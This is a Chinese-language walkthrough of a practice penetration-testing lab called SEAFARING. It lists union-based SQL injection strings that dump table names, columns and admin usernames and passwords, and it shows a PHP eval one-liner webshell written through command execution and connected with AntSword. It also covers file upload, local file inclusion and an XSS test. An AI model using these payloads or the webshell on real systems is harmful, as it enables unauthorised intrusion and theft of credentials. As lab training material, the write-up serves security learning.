SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

3.三处都是回显点

4.联合查询爆出库名

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

2.上传一句话木马进去

3.将文件地址拼接到网址后进行访问

4.使用蚁剑连接

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

2.尝试输入ls有效

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php

4.复制地址用蚁剑连接

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

2.访问php文件复制地址蚁剑连连接即可

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

相关推荐
极限实验室2 小时前
APM(一):Skywalking 与 Easyearch 集成
数据库·云原生
饕餮争锋2 小时前
SQL条件中WHERE 1=1 的功能
数据库·sql
玄斎3 小时前
MySQL 单表操作通关指南:建库 / 建表 / 插入 / 增删改查
运维·服务器·数据库·学习·程序人生·mysql·oracle
三七吃山漆3 小时前
攻防世界——wife_wife
前端·javascript·web安全·网络安全·ctf
编织幻境的妖3 小时前
SQL查询连续登录用户方法详解
java·数据库·sql
编程小Y4 小时前
MySQL 与 MCP 集成全解析(核心原理 + 实战步骤 + 应用场景)
数据库·mysql·adb
零度@4 小时前
SQL 调优全解:从 20 秒到 200 ms 的 6 步实战笔记(附脚本)
数据库·笔记·sql
Miss_Chenzr4 小时前
Springboot优卖电商系统s7zmj(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·spring boot·后端
lvbinemail5 小时前
Grafana模板自动复制图表
数据库·mysql·zabbix·grafana·监控
Miss_Chenzr5 小时前
Springboot旅游景区管理系统9fu3n(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·spring boot·旅游